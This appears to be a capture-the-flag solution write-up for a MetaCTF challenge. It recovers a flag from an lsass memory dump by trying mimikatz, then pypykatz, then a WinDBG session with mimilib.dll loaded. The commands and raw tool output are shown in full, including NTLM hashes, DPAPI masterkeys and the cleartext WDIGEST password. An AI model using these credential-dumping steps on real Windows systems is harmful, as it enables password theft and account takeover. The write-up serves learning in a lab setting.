Solution
With challenges like this, our goal is usually to get the user credentials from the lsass dump.
Typically an attacker will use mimikatz or pypykatz for this:
Mimikatz.exe
mimikatz # sekurlsa::minidump lsass.DMP
Switch to MINIDUMP : 'lsass.DMP'
mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.DMP' file for minidump...
ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list
mimikatz.exe errors, so that method isn’t working.
Pypykatz
$ pypykatz lsa minidump lsass.DMP
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 734641 (b35b1)
session_id 1
username admin
domainname Windows11
logon_server WINDOWS11
logon_time 2024-07-24T02:44:18.032167+00:00
sid S-1-5-21-483730973-3935168663-2658520910-1001
luid 734641
== MSV ==
Username: admin
Domain: Windows11
LM: NA
NT: bc53e562b5f887d90d0127c3004d5e57
SHA1: 3e2b30fa9dc8fcea2b23b66672e50cfbcd375940
DPAPI: 3e2b30fa9dc8fcea2b23b66672e50cfb
== Kerberos ==
Username: admin
Domain: Windows11
== DPAPI [b35b1]==
luid 734641
key_guid e48fdb29-12c3-4c56-9cfc-8f2b7ada9bfb
masterkey 4f41985744b69b72e74fb579cfdb5741b27b56b357ccb20b685e2013c49e96b6f563b1080b7f3b1084704d129eb7f62327b65c0f86eb269fc7e342fea35b4d2c
sha1_masterkey 165486625720178d5e0794f08ba282e6583683dc
== DPAPI [b35b1]==
luid 734641
key_guid c43e0061-0e96-4d35-bc0e-b016fc57c107
masterkey e5e0fd1e85f354da3d40c9ee48e3ca0baf277572c2c699f1791538f26f382f80ff5a549c998650ab4d9dd6e0d6dc1385166b715a57ddbc911059a905b65d3ed7
sha1_masterkey 02538d30315be443b4570f9a00e820d5975f1182
== DPAPI [b35b1]==
luid 734641
key_guid 687d0a9c-02e3-4752-896a-5a9aa213b059
masterkey f6ce01789039d4bf1b14976712ce9aeb81ee4c754d5bad701a8ba1a8d76fc9cb1f78acfb6ef274ac5ce0f4a226542e6ca64f95bde67bd0e702c4f9e684f14d1b
sha1_masterkey 1c4ae82c98c3308fac9bc5485ff0c1bbdff56099
== LogonSession ==
authentication_id 734600 (b3588)
session_id 1
username admin
domainname Windows11
logon_server WINDOWS11
logon_time 2024-07-24T02:44:18.032167+00:00
sid S-1-5-21-483730973-3935168663-2658520910-1001
luid 734600
== MSV ==
Username: admin
Domain: Windows11
LM: NA
NT: bc53e562b5f887d90d0127c3004d5e57
SHA1: 3e2b30fa9dc8fcea2b23b66672e50cfbcd375940
DPAPI: 3e2b30fa9dc8fcea2b23b66672e50cfb
== Kerberos ==
Username: admin
Domain: Windows11
Pypycatz is also failing because none of the WDIGEST fields contains clear text credentials. Thankfully there’s some more methods we can try.
WinDBG with DLL Loading
Another method we can try was written about by Daniel Sauder, it uses WinDBG and loads a DLL to analyize the lsass dump. A link to the method can be found here
The basic steps are as follows:
- Open lsass.DMP with WinDBG
- .load <path-to-mimilib.dll>
- !mimikatz
- Get credentials
0:000> .load D:\Forensic_tool\Mimikatz\mimilib.dll
.#####. mimikatz 2.2.0 (x64) built on Aug 10 2021 02:01:09
.## ^ ##. "A La Vie, A L'Amour" - Windows build 22631
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' https://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' WinDBG extension ! * * */
===================================
# * Kernel mode * #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
# * User mode * #
===================================
0:000> !mimikatz
===================================
0:000> !mimikatz
DPAPI Backup keys
=================
Current prefered key: {00000000-0000-0000-0000-000000000000}
Compatibility prefered key: {00000000-0000-0000-0000-000000000000}
DPAPI System
============
full: 4a9f20042cf5603b8cd5adaa4514ffd119072973ad140ddd0c409307bf260161b6f60a43687de206
m/u : 4a9f20042cf5603b8cd5adaa4514ffd119072973 / ad140ddd0c409307bf260161b6f60a43687de206
SekurLSA
========
Authentication Id : 0 ; 684934 (00000000:000a7386)
Session : Interactive from 1
User Name : admin
Domain : Windows11
Logon Server : WINDOWS11
Logon Time : 7/24/2024 10:39:46 AM
SID : S-1-5-21-483730973-3935168663-2658520910-1001
msv :
[00000003] Primary
* Username : admin
* Domain : Windows11
* NTLM : bc53e562b5f887d90d0127c3004d5e57
* SHA1 : 3e2b30fa9dc8fcea2b23b66672e50cfbcd375940
* DPAPI : fcea2b23b66672e50cfbcd375940bc53
tspkg : KO
wdigest :
* Username : admin
* Domain : Windows11
* Password : MetaCTF{Rice_shirt_rice_money}
kerberos :
* Username : admin
* Domain : Windows11
* Password : (null)
ssp :
masterkey :
[00000000]
* GUID : {e48fdb29-12c3-4c56-9cfc-8f2b7ada9bfb}
* Time : 7/24/2024 3:53:07 AM
* MasterKey : 4f41985744b69b72e74fb579cfdb5741b27b56b357ccb20b685e2013c49e96b6f563b1080b7f3b1084704d129eb7f62327b65c0f86eb269fc7e342fea35b4d2c
[00000001]
* GUID : {687d0a9c-02e3-4752-896a-5a9aa213b059}
* Time : 7/24/2024 3:53:07 AM
* MasterKey : f6ce01789039d4bf1b14976712ce9aeb81ee4c754d5bad701a8ba1a8d76fc9cb1f78acfb6ef274ac5ce0f4a226542e6ca64f95bde67bd0e702c4f9e684f14d1b
[00000002]
* GUID : {c43e0061-0e96-4d35-bc0e-b016fc57c107}
* Time : 7/24/2024 3:52:37 AM
* MasterKey : e5e0fd1e85f354da3d40c9ee48e3ca0baf277572c2c699f1791538f26f382f80ff5a549c998650ab4d9dd6e0d6dc1385166b715a57ddbc911059a905b65d3ed7
credman :
Authentication Id : 0 ; 684887 (00000000:000a7357)
Session : Interactive from 1
User Name : admin
Domain : Windows11
Logon Server : WINDOWS11
Logon Time : 7/24/2024 10:39:46 AM
SID : S-1-5-21-483730973-3935168663-2658520910-1001
msv :
[00000003] Primary
* Username : admin
* Domain : Windows11
* NTLM : bc53e562b5f887d90d0127c3004d5e57
* SHA1 : 3e2b30fa9dc8fcea2b23b66672e50cfbcd375940
* DPAPI : fcea2b23b66672e50cfbcd375940bc53
tspkg : KO
wdigest :
* Username : admin
* Domain : Windows11
* Password : MetaCTF{Rice_shirt_rice_money}
kerberos :
* Username : admin
* Domain : Windows11
* Password : (null)
ssp :
masterkey :
credman :
Flag
MetaCTF{Rice_shirt_rice_money}